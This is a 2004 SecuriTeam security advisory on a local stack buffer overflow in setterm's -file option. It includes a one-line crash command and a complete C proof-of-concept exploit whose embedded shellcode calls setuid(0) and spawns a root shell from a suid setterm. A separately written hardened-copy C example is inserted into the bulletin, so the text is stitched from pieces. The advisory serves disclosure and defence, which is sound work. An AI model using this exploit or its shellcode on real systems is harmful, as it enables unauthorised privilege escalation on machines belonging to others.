[UNIX] Setterm Local Stack Overflow Vulnerability
From: SecuriTeam (support_at_securiteam.com)
Date: 07/01/04
To: list@securiteam.com
Date: 1 Jul 2004 18:05:54 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Setterm Local Stack Overflow Vulnerability
------------------------------------------------------------------------
SUMMARY
Setterm is "a utility that ships with many if not all UNIX and Linux
distributions that provides the user with the means to tweak and configure
the behavior of the system terminal". A local stack buffer overflow
vulnerability has been found in setterm. If setterm is installed suid, this
could lead to privilege escalation on the system.
DETAILS
Vulnerable Systems:
* setterm, all versions
The stack overflow exists because the argument to the -file command line
option is not bounds checked before it is copied into a fixed-size buffer;
an over-long argument therefore overwrites the stack beyond that buffer.
This can be seen with the following simple command:
$ setterm -file `perl -e 'print "A"x249'`
Segmentation fault
For a setterm that is installed suid, this simple and classic overflow
condition can be used to escalate privileges on the system. Proof of
concept exploit code has been provided and is listed below:
/***********************************************************************
 * setterm (All v3rs10nz) Proof of concept Xploit
 *
 * Author: Uz4yh4N   Contact: Lord@linuxmail.org
 *
 * Tested Against Slackware and SuSe Distros.
 *
 * The bug was found 20 May 2004 03:35
 * Gr33t1ngz Efnet folk.
 * This is a Lame stack overflow you know. But i think the Setterm
 * is an important tool.
 * And SPECIAL thanks to N4rK07IX
 * The calm before the storm, by Uz4yh4N
 ***********************************************************************/
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>

#define MAXDATA 4000
#define BEEP    1500
#define PATH    "/usr/bin/setterm" // you can change this for your distro.
#define PROG    "setterm"

char shelltoks[] =
    "\x31\xc0"             // xor %eax,%eax
    "\x31\xdb"             // xor %ebx,%ebx
    "\x31\xc9"             // xor %ecx,%ecx
    "\xb0\x46"             // mov $0x46,%al
    "\xcd\x80"             // int $0x80
    "\x31\xdb"             // xor %ebx,%ebx
    "\x89\xd8"             // mov %ebx,%eax
    "\xb0\x2e"             // mov $0x2e,%al
    "\xcd\x80"             // int $0x80
    "\x31\xc0"             // xor %eax,%eax
    "\x50"                 // push %eax
    "\x68\x2f\x2f\x73\x68" // push $0x68732f2f
    "\x68\x2f\x62\x69\x6e" // push $0x6e69622f
    "\x89\xe3"             // mov %esp,%ebx
    "\x8d\x54\x24\x08"     // lea 0x8(%esp,1),%edx
    "\x50"                 // push %eax
    "\x53"                 // push %ebx
    "\x8d\x0c\x24"         // lea (%esp,1),%ecx
    "\xb0\x0b"             // mov $0xb,%al
    "\xcd\x80"             // int $0x80
    "\x31\xc0"             // xor %eax,%eax
    "\xb0\x01"             // mov $0x1,%al
    "\xcd\x80";            // int $0x80

int main(void)
{
    char buffer[MAXDATA];
    char ybuf[BEEP];
    int i, *adr_p;
    unsigned long ret;

    printf("--> Setterm local stack overflow Proof of Concept Xploit\n");
    printf("--> Author Uz4yh4N Lord@linuxmail.org\n");

    memset(ybuf, 0x90, sizeof(ybuf));
    memcpy(&ybuf[BEEP - strlen(shelltoks)], shelltoks, strlen(shelltoks));
    memcpy(ybuf, "SEXY=", 5);
    putenv(ybuf);

    ret = 0xBFFFFFFA - strlen(PATH) - strlen(ybuf);
    printf("--> Ret address at 0x%x\n", ret);
    printf("--> Evil buffer loading\n");

    adr_p = (int *)(buffer);
    for (i = 0; i < MAXDATA; i += 4)
        *adr_p++ = ret;

    if (execl(PATH, PROG, "-file", buffer, NULL) == -1) {
        perror("execl");
        exit(-1);
    }
    return 0;
}
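The unchecked copy described under DETAILS, shown beside a bounded replacement, as an added example for readers: this is not setterm's source and not the advisory's proof of concept. The buffer size FILENAME_BUF, the function names and the "-file" option walk are assumptions; the advisory only states that a 249-byte -file argument is enough to crash setterm.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical buffer size (assumption). The advisory does not give
 * setterm's real size, only that a 249-byte -file argument crashes it. */
#define FILENAME_BUF 64

/* Vulnerable pattern (illustrative, not setterm's source): the option
 * value is copied into a fixed-size buffer with no length check, so an
 * argument longer than FILENAME_BUF-1 bytes overwrites whatever follows
 * the buffer on the stack. Shown for contrast; never called below. */
void copy_file_arg_unchecked(char *dst, const char *arg)
{
    strcpy(dst, arg);
}

/* Hardened form: the argument is scanned for its NUL only within the
 * destination size, the copy is refused when the value plus its NUL
 * would not fit, and dst is left untouched on failure.
 * Returns 0 on success, -1 with errno = ENAMETOOLONG when too long. */
int copy_file_arg_checked(char *dst, size_t dstsz, const char *arg)
{
    const char *nul;

    if (dstsz == 0) {
        errno = ENAMETOOLONG;
        return -1;
    }
    nul = memchr(arg, '\0', dstsz);   /* never reads past dstsz bytes */
    if (nul == NULL) {                /* no room for the terminating NUL */
        errno = ENAMETOOLONG;
        return -1;
    }
    memcpy(dst, arg, (size_t)(nul - arg) + 1);
    return 0;
}

/* Walks argv the way a setterm-like option parser would, looking for
 * "-file <name>" and storing the name with the bounded copy.
 * Returns 1 when the option was found and stored, 0 when it is absent,
 * -1 (errno set) when its value is missing (EINVAL) or too long. */
int parse_file_option(int argc, char **argv, char *dst, size_t dstsz)
{
    int i;

    for (i = 1; i < argc; i++) {
        if (strcmp(argv[i], "-file") != 0)
            continue;
        if (i + 1 >= argc) {
            errno = EINVAL;
            return -1;
        }
        return copy_file_arg_checked(dst, dstsz, argv[i + 1]) == 0 ? 1 : -1;
    }
    return 0;
}

/* Stand-alone demo: feeds the parser the advisory's probe (249 'A's,
 * constructed here) and then an ordinary file name. */
int main(void)
{
    char probe[250];
    char dst[FILENAME_BUF];
    char *argv_probe[] = { "setterm", "-file", probe, NULL };
    char *argv_ok[]    = { "setterm", "-file", "dump.txt", NULL };

    memset(probe, 'A', sizeof probe - 1);
    probe[sizeof probe - 1] = '\0';

    if (parse_file_option(3, argv_probe, dst, sizeof dst) < 0)
        printf("249-byte -file argument rejected: %s\n", strerror(errno));
    if (parse_file_option(3, argv_ok, dst, sizeof dst) == 1)
        printf("-file accepted: %s\n", dst);
    return 0;
}
```

The check is done on the destination size, not on the argument, so the argument is never scanned beyond what could fit; an over-long value is refused before any byte reaches the buffer, which is what a suid program must do with anything it takes from argv.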
ADDITIONAL INFORMATION
The information has been provided by <mailto:lord@linuxmail.org> Orhan BAYRAK.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.